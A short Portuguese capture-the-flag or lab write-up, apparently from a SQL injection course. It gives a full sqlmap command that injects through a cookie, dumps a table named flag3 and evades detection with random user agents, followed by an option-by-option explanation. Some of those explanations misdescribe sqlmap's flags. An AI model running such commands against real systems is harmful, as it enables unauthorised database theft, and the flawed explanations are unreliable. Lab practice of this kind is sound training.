Question-2
Qual é o conteúdo da tabela flag3? (Caso #3)

Analisei as requisições com o burp suite, e o id foi especificado como cookie

Pyload completo :
sqlmap -u http://83.136.253.64:44703/case3.php --cookie="id=1*" --batch --method PUT -D testdb --tables -T flag3 --columns content --dump --random-agent

Aqui está o que cada opção e parâmetro no comando faz:
sqlmap
: Esta é a ferramenta de linha de comando usada para automatizar a descoberta e exploração de injeções de SQL.-u http://83.136.253.64:44703/case3.php
: Especifica a URL do aplicativo web vulnerável.--cookie="id=1*"
: Especifica o cookie a ser usado na requisição. O caractere*
é frequentemente usado como um curinga em tentativas de injeção de SQL para testar diferentes cenários.--batch
: Executa o sqlmap no modo batch (não-interativo), o que é útil para testes automatizados.--method PUT
: Especifica o método HTTP a ser usado na requisição. Neste caso, está usando PUT.-D testdb
: Especifica o nome do banco de dados (testdb
) para enumerar as tabelas.--tables -T flag3
: Enumera as tabelas (--tables
) no banco de dados especificado (-D testdb
). Alveja a tabelaflag3
(-T flag3
).--columns content
: Enumera as colunas (--columns
) na tabela especificada (-T flag3
). Alveja a colunacontent
.--dump
: Extrai o conteúdo da tabela (-T flag3
) e da coluna (--columns content
) especificadas.--random-agent
: Utiliza um cabeçalho de Agente de Usuário HTTP aleatório para ajudar a evitar detecção.
Last updated